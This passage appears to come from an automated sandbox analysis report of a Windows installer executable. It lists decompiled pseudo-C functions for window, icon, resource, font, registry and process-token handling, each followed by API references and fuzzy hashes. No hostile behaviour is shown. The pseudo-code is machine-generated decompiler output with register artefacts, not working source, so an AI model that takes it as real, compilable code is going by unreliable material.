                                                            					_t31 = MulDiv( *(_t41 + 0x5c), _a8, _a4);
                                                            				}
                                                            				return  *((intOrPtr*)( *_t41 + 0xc8))(_t31, _t55);
                                                            			}

                                                            APIs
                                                            • MulDiv.KERNEL32(?,0068D5D0,?), ref: 005CE38D
                                                            • MulDiv.KERNEL32(?,005CE4BF,0068D5D0), ref: 005CE3A0
                                                            • MulDiv.KERNEL32(?,0068D5D0,?), ref: 005CE3B7
                                                            • MulDiv.KERNEL32(?,005CE4BF,0068D5D0), ref: 005CE3D5
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ac23038dacf6796b57d110ed30358184083c47a134689276074c101833fe842e
                                                            • Instruction ID: 3e71b6adc286f200af4aaafaaf3a8fca573aba72415269075ac824ff0f327e96
                                                            • Opcode Fuzzy Hash: ac23038dacf6796b57d110ed30358184083c47a134689276074c101833fe842e
                                                            • Instruction Fuzzy Hash: B9113072A04244AFCB44DEDDD8C5E9F7BEDEF48364B144499F908DB242C678ED808BA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 67%
                                                            			E004F53AC(intOrPtr* __eax, struct HICON__* __edx, void* __eflags) {
                                                            				intOrPtr* _v8;
                                                            				struct _ICONINFO _v28;
                                                            				intOrPtr _v44;
                                                            				intOrPtr _v48;
                                                            				void _v52;
                                                            				intOrPtr _t33;
                                                            				intOrPtr _t45;
                                                            				void* _t49;
                                                            				void* _t51;
                                                            				intOrPtr _t52;
                                                            
                                                            				_t49 = _t51;
                                                            				_t52 = _t51 + 0xffffffd0;
                                                            				_v8 = __eax;
                                                            				E004F5338(_v8, __edx);
                                                            				if(__edx == 0 || GetIconInfo(__edx,  &_v28) == 0) {
                                                            					return  *((intOrPtr*)( *_v8 + 0x10))();
                                                            				} else {
                                                            					_push(_t49);
                                                            					_push(0x4f5429);
                                                            					_push( *[fs:edx]);
                                                            					 *[fs:edx] = _t52;
                                                            					if(GetObjectW(_v28.hbmColor, 0x18,  &_v52) != 0) {
                                                            						_t33 =  *((intOrPtr*)(_v8 + 0x28));
                                                            						 *((intOrPtr*)(_t33 + 0xc)) = _v48;
                                                            						 *((intOrPtr*)(_t33 + 0x10)) = _v44;
                                                            					}
                                                            					_pop(_t45);
                                                            					 *[fs:eax] = _t45;
                                                            					_push(E004F5430);
                                                            					DeleteObject(_v28.hbmMask);
                                                            					return DeleteObject(_v28.hbmColor);
                                                            				}
                                                            			}

                                                            APIs
                                                            • GetIconInfo.USER32(00000000,00000000), ref: 004F53CD
                                                            • GetObjectW.GDI32(0068D5D0,00000018,00000000,00000000,004F5429,?,004C0068), ref: 004F53EE
                                                            • DeleteObject.GDI32(?), ref: 004F541A
                                                            • DeleteObject.GDI32(0068D5D0), ref: 004F5423
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: Object$Delete$IconInfo
                                                            • String ID:
                                                            • API String ID: 507670407-0
                                                            • Opcode ID: 939d8cbd648baad16ebc5502745bc899ef72b4fd7c693fad9428492138ac7e12
                                                            • Instruction ID: 4322d414b200eb17045e09ec041732102b9da4c87ad94fc4c4d540c0fc3291bf
                                                            • Opcode Fuzzy Hash: 939d8cbd648baad16ebc5502745bc899ef72b4fd7c693fad9428492138ac7e12
                                                            • Instruction Fuzzy Hash: 2B11A375A00608AFCB04DFA6D981DAEB7F9EF88314B5081AAFE04D3351DB38DE408B54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 93%
                                                            			E005B9590(signed char __eax, intOrPtr _a4) {
                                                            				int _t22;
                                                            				void* _t23;
                                                            				int _t31;
                                                            				signed int _t35;
                                                            				signed char _t38;
                                                            				void* _t43;
                                                            				void* _t44;
                                                            
                                                            				_t38 = __eax;
                                                            				_t2 = _a4 - 4; // 0xc31852ff
                                                            				_t22 = IsWindowVisible( *( *_t2 + 0x188));
                                                            				asm("sbb eax, eax");
                                                            				_t23 = _t22 + 1;
                                                            				_t43 = _t23 -  *0x6cccd4; // 0x0
                                                            				if(_t43 == 0) {
                                                            					_t44 = _t38 -  *0x6cccd4; // 0x0
                                                            					if(_t44 != 0) {
                                                            						_t5 = _a4 - 4; // 0xc31852ff
                                                            						if( *((char*)( *_t5 + 0xeb)) != 0 &&  *0x6cccd4 == 0) {
                                                            							_t8 = _a4 - 4; // 0xc31852ff
                                                            							_t35 = GetWindowLongW( *( *_t8 + 0x188), 0xffffffec);
                                                            							_t11 = _a4 - 4; // 0xc31852ff
                                                            							SetWindowLongW( *( *_t11 + 0x188), 0xffffffec, _t35 | 0x08000000);
                                                            						}
                                                            						_t16 = _a4 - 4; // 0xc31852ff
                                                            						_t31 = SetWindowPos( *( *_t16 + 0x188), 0, 0, 0, 0, 0,  *(0x6cccd6 + (_t38 & 0x000000ff) * 2) & 0x0000ffff);
                                                            						 *0x6cccd4 = _t38;
                                                            						return _t31;
                                                            					}
                                                            				}
                                                            				return _t23;
                                                            			}











                                                            APIs
                                                            • IsWindowVisible.USER32 ref: 005B95A3
                                                            • GetWindowLongW.USER32(?,000000EC), ref: 005B95E5
                                                            • SetWindowLongW.USER32 ref: 005B95FF
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,C31852FF,?,00000000,?,005B96B9,?,?,?,00000000), ref: 005B9627
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: Window$Long$Visible
                                                            • String ID:
                                                            • API String ID: 2967648141-0
                                                            • Opcode ID: c53b897a5a1d9d2e71e6f85843be0105534f78b66b69f438aa9e828b25e0526c
                                                            • Instruction ID: de5a40ccb5800a4cef2b87037ee72a09c9fd5293aebedbf233be07227e7c069f
                                                            • Opcode Fuzzy Hash: c53b897a5a1d9d2e71e6f85843be0105534f78b66b69f438aa9e828b25e0526c
                                                            • Instruction Fuzzy Hash: B31161742851446FDB00DB28D888FFA7FE9AB45324F458191F988CB362CA38ED80CB54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 80%
                                                            			E0046A218(void* __eax, struct HINSTANCE__* __edx, WCHAR* _a8) {
                                                            				WCHAR* _v8;
                                                            				void* __ebx;
                                                            				void* __ecx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				void* __ebp;
                                                            				void* _t18;
                                                            				void* _t23;
                                                            				WCHAR* _t24;
                                                            				void* _t25;
                                                            				struct HRSRC__* _t29;
                                                            				void* _t30;
                                                            				struct HINSTANCE__* _t31;
                                                            				void* _t32;
                                                            
                                                            				_v8 = _t24;
                                                            				_t31 = __edx;
                                                            				_t23 = __eax;
                                                            				_t29 = FindResourceW(__edx, _v8, _a8);
                                                            				 *(_t23 + 0x10) = _t29;
                                                            				if(_t29 == 0) {
                                                            					E0046A178(_t23, _t24, _t29, _t31, _t32);
                                                            					_pop(_t24);
                                                            				}
                                                            				_t5 = _t23 + 0x10; // 0x46a2b4
                                                            				_t30 = LoadResource(_t31,  *_t5);
                                                            				 *(_t23 + 0x14) = _t30;
                                                            				if(_t30 == 0) {
                                                            					E0046A178(_t23, _t24, _t30, _t31, _t32);
                                                            				}
                                                            				_t7 = _t23 + 0x10; // 0x46a2b4
                                                            				_push(SizeofResource(_t31,  *_t7));
                                                            				_t8 = _t23 + 0x14; // 0x469b00
                                                            				_t18 = LockResource( *_t8);
                                                            				_pop(_t25);
                                                            				return E00469AAC(_t23, _t25, _t18);
                                                            			}


















                                                            APIs
                                                            • FindResourceW.KERNEL32(?,?,?,00444A50,?,00000001,00000000,?,0046A15A,00000000,00000000,?,006D579C,?,?,006AC890), ref: 0046A22F
                                                            • LoadResource.KERNEL32(?,0046A2B4,?,?,?,00444A50,?,00000001,00000000,?,0046A15A,00000000,00000000,?,006D579C,?), ref: 0046A249
                                                            • SizeofResource.KERNEL32(?,0046A2B4,?,0046A2B4,?,?,?,00444A50,?,00000001,00000000,?,0046A15A,00000000,00000000), ref: 0046A263
                                                            • LockResource.KERNEL32(00469B00,00000000,?,0046A2B4,?,0046A2B4,?,?,?,00444A50,?,00000001,00000000,?,0046A15A,00000000), ref: 0046A26D
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: Resource$FindLoadLockSizeof
                                                            • String ID:
                                                            • API String ID: 3473537107-0
                                                            • Opcode ID: c0a3742649e4821bf1d8e39dd4131d6b260b263a11f53cd498264533ba18d33a
                                                            • Instruction ID: abb9b97bb193dfeb05d9d82a7f41705a61c143c3b7d9841fcbe573c2d8062a85
                                                            • Opcode Fuzzy Hash: c0a3742649e4821bf1d8e39dd4131d6b260b263a11f53cd498264533ba18d33a
                                                            • Instruction Fuzzy Hash: C4F081B36406046F5745EE9DA881DAB77ECEE89364310015FF908D7302EA39DD51477A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 90%
                                                            			E00610040(void* __eax, void* __ecx, void* __edx) {
                                                            				void* _v16;
                                                            				int _t13;
                                                            				void* _t20;
                                                            				void* _t26;
                                                            				void* _t27;
                                                            
                                                            				_push(__ecx);
                                                            				_t27 = __edx;
                                                            				_t26 = __eax;
                                                            				if(__ecx == 0) {
                                                            					_t20 = 0x80000002;
                                                            				} else {
                                                            					_t20 = 0x80000001;
                                                            				}
                                                            				if(E005C7A14(0,  *((intOrPtr*)(0x6ccfc0 + (E005C77E8() & 0x0000007f) * 4)), _t20,  &_v16, 2, 0) == 0) {
                                                            					RegDeleteValueW(_v16, E0040B278(_t26));
                                                            					RegCloseKey(_v16);
                                                            				}
                                                            				_t13 = RemoveFontResourceW(E0040B278(_t27));
                                                            				if(_t13 != 0) {
                                                            					_t13 = SendNotifyMessageW(0xffff, 0x1d, 0, 0);
                                                            				}
                                                            				return _t13;
                                                            			}









                                                            APIs
                                                            • RegDeleteValueW.ADVAPI32(?,00000000,?,00000002,00000000,?,?,?,?,0062AC8F), ref: 0061008A
                                                            • RegCloseKey.ADVAPI32(00000000,?,00000000,?,00000002,00000000,?,?,?,?,0062AC8F), ref: 00610093
                                                            • RemoveFontResourceW.GDI32(00000000), ref: 006100A0
                                                            • SendNotifyMessageW.USER32(0000FFFF,0000001D,00000000,00000000), ref: 006100B4
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: CloseDeleteFontMessageNotifyRemoveResourceSendValue
                                                            • String ID:
                                                            • API String ID: 261542597-0
                                                            • Opcode ID: 77a4b43a7585b641cb4056c657f18fe2b74d7f9113a8b954b3ed7bedb6d61676
                                                            • Instruction ID: 1dce9f2b70afa6587215b720e4c7b57155893329b24cac9d33cbe1fd09ddcff8
                                                            • Opcode Fuzzy Hash: 77a4b43a7585b641cb4056c657f18fe2b74d7f9113a8b954b3ed7bedb6d61676
                                                            • Instruction Fuzzy Hash: B2F0C87674430567EA20B6B65C4BFEF128E8FC9745F24492EBA04EB282D668DC814369
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 87%
                                                            			E0050E958(struct HWND__* __eax, void* __ecx) {
                                                            				intOrPtr _t5;
                                                            				struct HWND__* _t12;
                                                            				void* _t15;
                                                            				DWORD* _t16;
                                                            
                                                            				_t13 = __ecx;
                                                            				_push(__ecx);
                                                            				_t12 = __eax;
                                                            				_t15 = 0;
                                                            				if(__eax != 0 && GetWindowThreadProcessId(__eax, _t16) != 0 && GetCurrentProcessId() ==  *_t16) {
                                                            					_t5 =  *0x6d5648; // 0x0
                                                            					if(GlobalFindAtomW(E0040B278(_t5)) !=  *0x6d5642) {
                                                            						_t15 = E0050E924(_t12, _t13);
                                                            					} else {
                                                            						_t15 = GetPropW(_t12,  *0x6d5642 & 0x0000ffff);
                                                            					}
                                                            				}
                                                            				return _t15;
                                                            			}








                                                            APIs
                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 0050E965
                                                            • GetCurrentProcessId.KERNEL32(?,00000000,00000000,005BA39A,?,?,00000000,00000001,005B8697,?,00000000,00000000,00000000,00000000), ref: 0050E96E
                                                            • GlobalFindAtomW.KERNEL32(00000000), ref: 0050E983
                                                            • GetPropW.USER32 ref: 0050E99A
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                                                            • String ID:
                                                            • API String ID: 2582817389-0
                                                            • Opcode ID: 96014bfda2539c3c724341726d25520330f77261c7fcf234c4c7e102e9717c52
                                                            • Instruction ID: 299b27e64c01e87a133ce8a54c99347aef86e5c58dac0e1e1101b5cceb09c5b5
                                                            • Opcode Fuzzy Hash: 96014bfda2539c3c724341726d25520330f77261c7fcf234c4c7e102e9717c52
                                                            • Instruction Fuzzy Hash: 09F0ECA160511166CB60BBB65C8787F5A8C9FC43907751D2BF841DA192D514CC8142FE
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E006A5D88() {
                                                            				long _v8;
                                                            				void _v12;
                                                            				void* _v16;
                                                            				void* _t16;
                                                            				HANDLE* _t17;
                                                            
                                                            				_t17 =  &_v12;
                                                            				_t16 = 0;
                                                            				if(OpenProcessToken(GetCurrentProcess(), 8, _t17) != 0) {
                                                            					_v12 = 0;
                                                            					if(GetTokenInformation(_v16, 0x12,  &_v12, 4,  &_v8) != 0) {
                                                            						_t16 = _v16;
                                                            					}
                                                            					CloseHandle( *_t17);
                                                            				}
                                                            				return _t16;
                                                            			}









                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(00000008), ref: 006A5D91
                                                            • OpenProcessToken.ADVAPI32(00000000,00000008), ref: 006A5D97
                                                            • GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008), ref: 006A5DB9
                                                            • CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008), ref: 006A5DCA
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                            • String ID:
                                                            • API String ID: 215268677-0
                                                            • Opcode ID: afea7f4269af62d161ed65023b08510fb3f5f5d3f19be2d10221e2fcac776304
                                                            • Instruction ID: 606920211f29873d44d72264013709cf63daaae85b794eef22724c21b877f5a5
                                                            • Opcode Fuzzy Hash: afea7f4269af62d161ed65023b08510fb3f5f5d3f19be2d10221e2fcac776304
                                                            • Instruction Fuzzy Hash: 30F030716043017BD700EAB58D82EDB77DCAF45715F00482DBA98C7281DA38ED489766
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E004F5548() {
                                                            				signed char _v28;
                                                            				void* _t4;
                                                            				signed int _t8;
                                                            				struct HDC__* _t9;
                                                            				struct tagTEXTMETRICW* _t10;
                                                            
                                                            				_t8 = 1;
                                                            				_t9 = GetDC(0);
                                                            				if(_t9 != 0) {
                                                            					_t4 =  *0x6d54b0; // 0x58a00b4
                                                            					if(SelectObject(_t9, _t4) != 0 && GetTextMetricsW(_t9, _t10) != 0) {
                                                            						_t8 = _v28 & 0x000000ff;
                                                            					}
                                                            					ReleaseDC(0, _t9);
                                                            				}
                                                            				return _t8;
                                                            			}









                                                            APIs
                                                            • GetDC.USER32(00000000), ref: 004F5551
                                                            • SelectObject.GDI32(00000000,058A00B4), ref: 004F5563
                                                            • GetTextMetricsW.GDI32(00000000,?,00000000,058A00B4,00000000), ref: 004F556E
                                                            • ReleaseDC.USER32 ref: 004F557F
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: MetricsObjectReleaseSelectText
                                                            • String ID:
                                                            • API String ID: 2013942131-0
                                                            • Opcode ID: 7f08a457e74fbd3b271c5bbe40b56a30871c5d5dda21d4d00258fc544de77888
                                                            • Instruction ID: eb0f3ac5e6ff13c2d338f041733c2278b611cd6d279531a3f0c2a93b6799ed89
                                                            • Opcode Fuzzy Hash: 7f08a457e74fbd3b271c5bbe40b56a30871c5d5dda21d4d00258fc544de77888
                                                            • Instruction Fuzzy Hash: 64E0DF71E029A432D61071661C82BEF2A498F823AAF08112BFF08992D1DA0CC94083FE
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 72%
                                                            			E006B72C2(void* __ecx, void* __esi, void* __fp0) {
                                                            				void* _t21;
                                                            				intOrPtr* _t27;
                                                            				intOrPtr* _t33;
                                                            				void* _t41;
                                                            				intOrPtr _t43;
                                                            				char _t46;
                                                            				void* _t47;
                                                            				intOrPtr _t55;
                                                            				intOrPtr _t59;
                                                            				void* _t60;
                                                            				void* _t61;
                                                            				intOrPtr _t62;
                                                            				void* _t67;
                                                            
                                                            				_t67 = __fp0;
                                                            				_t60 = __esi;
                                                            				_t47 = __ecx;
                                                            				if(( *(_t61 - 9) & 0x00000001) != 0) {
                                                            					L3:
                                                            					_t46 = 1;
                                                            				} else {
                                                            					_t64 =  *(_t61 - 9) & 0x00000040;
                                                            					if(( *(_t61 - 9) & 0x00000040) != 0) {
                                                            						goto L3;
                                                            					} else {
                                                            						_t46 = 0;
                                                            					}
                                                            				}
                                                            				_t21 = E006A5DD8(_t46, _t47, 0, _t64, _t67);
                                                            				_t65 = _t21;
                                                            				if(_t21 != 0) {
                                                            					_t27 =  *0x6cdec4; // 0x6d579c
                                                            					SetWindowPos( *( *_t27 + 0x188), 0, 0, 0, 0, 0, 0x97);
                                                            					_push(_t61);
                                                            					_push(0x6b736d);
                                                            					_push( *[fs:eax]);
                                                            					 *[fs:eax] = _t62;
                                                            					_t33 =  *0x6cdec4; // 0x6d579c
                                                            					 *((intOrPtr*)(_t61 - 0x18)) =  *((intOrPtr*)( *_t33 + 0x188));
                                                            					 *((char*)(_t61 - 0x14)) = 0;
                                                            					E004244F8(L"/INITPROCWND=$%x ", 0, _t61 - 0x18, _t61 - 0x10);
                                                            					_push(_t61 - 0x10);
                                                            					E005C6E90(_t61 - 0x1c, _t46, _t60, _t65);
                                                            					_pop(_t41);
                                                            					E0040B470(_t41,  *((intOrPtr*)(_t61 - 0x1c)));
                                                            					_t43 =  *0x6d68d0; // 0x0
                                                            					E006A60E8(_t43, _t46, 0x6cd884,  *((intOrPtr*)(_t61 - 0x10)), _t60, _t65, _t67);
                                                            					_pop(_t59);
                                                            					 *[fs:eax] = _t59;
                                                            					 *((char*)(_t61 - 1)) = 1;
                                                            				}
                                                            				_pop(_t55);
                                                            				 *[fs:eax] = _t55;
                                                            				_push(E006B73CE);
                                                            				E0040A1C8(_t61 - 0x1c);
                                                            				return E0040A1C8(_t61 - 0x10);
                                                            			}

















                                                            APIs
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 006B7302
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: Window
                                                            • String ID: /INITPROCWND=$%x $@
                                                            • API String ID: 2353593579-4169826103
                                                            • Opcode ID: c5684dee33ba9897102623d205b8f12a775b2b56f0b9d91e0f24c978029d6739
                                                            • Instruction ID: aee196482ecc750f80196a5b85e8ce4b28bd470815894a77b79cec9963f5eee4
                                                            • Opcode Fuzzy Hash: c5684dee33ba9897102623d205b8f12a775b2b56f0b9d91e0f24c978029d6739
                                                            • Instruction Fuzzy Hash: 0721C070A083489FDB01EBA4D841FEE77F6EF89304F51447AF800E7291DA38AA45DB54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 66%
                                                            			E00435608(signed short* __eax, void* __ebx, void* __edx) {
                                                            				signed short* _v8;
                                                            				char _v16;
                                                            				char _v24;
                                                            				void* _t23;
                                                            				intOrPtr _t31;
                                                            				void* _t32;
                                                            				void* _t34;
                                                            
                                                            				_t23 = __edx;
                                                            				_v8 = __eax;
                                                            				_t2 =  &_v24; // 0x435946
                                                            				L0042F03C();
                                                            				 *[fs:eax] = _t34 + 0xffffffec;
                                                            				_t4 =  &_v24; // 0x435946
                                                            				E00430ED4( *((intOrPtr*)( *((intOrPtr*)( *0x6cdffc))))(_v8, 0x400, 0, 8,  *[fs:eax], 0x435674, _t34, _t2, __ebx, _t32), 8,  *_v8 & 0x0000ffff);
                                                            				_t6 =  &_v16; // 0x43596b
                                                            				E0040A61C(_t23,  *_t6);
                                                            				_t31 = _t4;
                                                            				 *[fs:eax] = _t31;
                                                            				_push(E0043567B);
                                                            				_t7 =  &_v24; // 0x435946
                                                            				return L00431164(_t7);
                                                            			}











                                                            APIs
                                                            • VariantInit.OLEAUT32(FYC), ref: 00435618
                                                              • Part of subcall function 0040A61C: SysReAllocStringLen.OLEAUT32(00000000,?,?), ref: 0040A636
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: AllocInitStringVariant
                                                            • String ID: FYC$kYC
                                                            • API String ID: 4010818693-1629163012
                                                            • Opcode ID: 3b028a09afde62da82f47710d3d6daef9e5d11d6f2f19900e295b27d7684dbff
                                                            • Instruction ID: 78d3457c21f8c6ae710edabf1b7f51a26e4fb704544ac86c5ed1d2f79e361521
                                                            • Opcode Fuzzy Hash: 3b028a09afde62da82f47710d3d6daef9e5d11d6f2f19900e295b27d7684dbff
                                                            • Instruction Fuzzy Hash: 2FF08171704608AFD700EB95CC52E9EB3F8EB4D700FA04176F604E3690DA346E04C769
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 73%
                                                            			E006B8CAC(void* __edx) {
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				void* __ebp;
                                                            				void* _t1;
                                                            				int _t9;
                                                            				void* _t12;
                                                            				void* _t15;
                                                            				intOrPtr _t16;
                                                            				void* _t17;
                                                            				void* _t18;
                                                            				intOrPtr _t20;
                                                            
                                                            				_t15 = __edx;
                                                            				if( *0x6d68e5 != 0) {
                                                            					E00616130(L"Detected restart. Removing temporary directory.", _t12, _t17, _t18);
                                                            					_push(0x6b8ce7);
                                                            					_push( *[fs:eax]);
                                                            					 *[fs:eax] = _t20;
                                                            					E006ACE20();
                                                            					E006ACB10(_t12, _t15, _t17, _t18);
                                                            					_pop(_t16);
                                                            					 *[fs:eax] = _t16;
                                                            					E00615560();
                                                            					_t9 =  *0x6cd884; // 0x1
                                                            					return TerminateProcess(GetCurrentProcess(), _t9);
                                                            				}
                                                            				return _t1;
                                                            			}

                                                            APIs
                                                              • Part of subcall function 006ACE20: FreeLibrary.KERNEL32(00000000,006B8CD8,00000000,006B8CE7,?,?,?,?,?,006B97CB), ref: 006ACE36
                                                              • Part of subcall function 006ACB10: GetTickCount.KERNEL32 ref: 006ACB58
                                                              • Part of subcall function 00615560: SendMessageW.USER32(00000000,00000B01,00000000,00000000), ref: 0061557F
                                                            • GetCurrentProcess.KERNEL32(00000001,?,?,?,?,006B97CB), ref: 006B8D01
                                                            • TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,006B97CB), ref: 006B8D07
                                                            Strings
                                                            • Detected restart. Removing temporary directory., xrefs: 006B8CBB
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
                                                            • String ID: Detected restart. Removing temporary directory.
                                                            • API String ID: 1717587489-3199836293
                                                            • Opcode ID: ba331b089060afb977d72fce05483963aa44ed152fcb3281d86fb57da4e379c7
                                                            • Instruction ID: 85aea6856e01ecd59818c985a9c9c54c6fb1bec533a363d5825b66760217dfd7
                                                            • Opcode Fuzzy Hash: ba331b089060afb977d72fce05483963aa44ed152fcb3281d86fb57da4e379c7
                                                            • Instruction Fuzzy Hash: 38E0E5F16082446EE2417BB9FC13DA67F9FDB86764B51043BF50083542D9295C80C338
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 62%
                                                            			E005C8790(void* __eax, void* __edx, void* __eflags) {
                                                            				void* __ebx;
                                                            				void* __esi;
                                                            				void* _t9;
                                                            				void* _t11;
                                                            				intOrPtr* _t12;
                                                            				void* _t14;
                                                            				void* _t15;
                                                            
                                                            				_t14 = __edx;
                                                            				_t15 = __eax;
                                                            				E005C8820(__eax, __eflags);
                                                            				_t12 = E00414020(_t11, _t15, GetModuleHandleW(L"user32.dll"), L"ShutdownBlockReasonCreate");
                                                            				if(_t12 == 0) {
                                                            					__eflags = 0;
                                                            					return 0;
                                                            				}
                                                            				_t9 =  *_t12(_t15, E0040B278(_t14));
                                                            				asm("sbb eax, eax");
                                                            				return _t9 + 1;
                                                            			}

                                                            APIs
                                                              • Part of subcall function 005C8820: GetModuleHandleW.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,?,005C879E,?,?,?,006B7DE9,0000000A,00000002,00000001,00000031,00000000,006B8019), ref: 005C882E
                                                            • GetModuleHandleW.KERNEL32(user32.dll,ShutdownBlockReasonCreate,?,?,?,006B7DE9,0000000A,00000002,00000001,00000031,00000000,006B8019,?,00000000,006B80E6), ref: 005C87A8
                                                              • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: HandleModule$AddressProc
                                                            • String ID: ShutdownBlockReasonCreate$user32.dll
                                                            • API String ID: 1883125708-2866557904
                                                            • Opcode ID: 362b9cabf5ac7dba346b645e3f3f1642086c31dc1fbbcb2e577ef78e05f1780f
                                                            • Instruction ID: 7110eff28424d8e01fad9884693b7150e68d4fec514983f83c6ed3211673b8d3
                                                            • Opcode Fuzzy Hash: 362b9cabf5ac7dba346b645e3f3f1642086c31dc1fbbcb2e577ef78e05f1780f
                                                            • Instruction Fuzzy Hash: E7E0C2623402212E020071FF2C85F7F08CCEDC8B6A3300C3EB200D3501EE5ACC0101AC
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 75%
                                                            			E005C7488(void* __eax, void* __esi, void* __ebp, void* __eflags) {
                                                            				char _v536;
                                                            				void* __ebx;
                                                            				intOrPtr* _t6;
                                                            				void* _t9;
                                                            				void* _t15;
                                                            
                                                            				_t9 = __eax;
                                                            				E0040A1C8(__eax);
                                                            				_t6 = E00414020(_t9, __esi, GetModuleHandleW(L"kernel32.dll"), L"GetSystemWow64DirectoryW");
                                                            				if(_t6 != 0) {
                                                            					_t6 =  *_t6( &_v536, 0x105);
                                                            					if(_t6 > 0 && _t6 < 0x105) {
                                                            						return E0040B318(_t9, 0x105, _t15);
                                                            					}
                                                            				}
                                                            				return _t6;
                                                            			}

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,GetSystemWow64DirectoryW,?,0060D678,00000000,0060D74A,?,?,006D579C,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C74A2
                                                              • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: AddressHandleModuleProc
                                                            • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                            • API String ID: 1646373207-1816364905
                                                            • Opcode ID: de46d4672a17b173ff2fef0e233ef539359877c205945a502f5ea110ad9e1670
                                                            • Instruction ID: e1b2a1fbaeccbf4b8658dcbc551e8be6aafa7850fd628b76cf9cecd9236f8401
                                                            • Opcode Fuzzy Hash: de46d4672a17b173ff2fef0e233ef539359877c205945a502f5ea110ad9e1670
                                                            • Instruction Fuzzy Hash: 95E0DFB07047051BDF1061FA8CC3F9A1D896BDC794F20483E3A90D66C2F9ACD9400AAA
                                                            Uniqueness

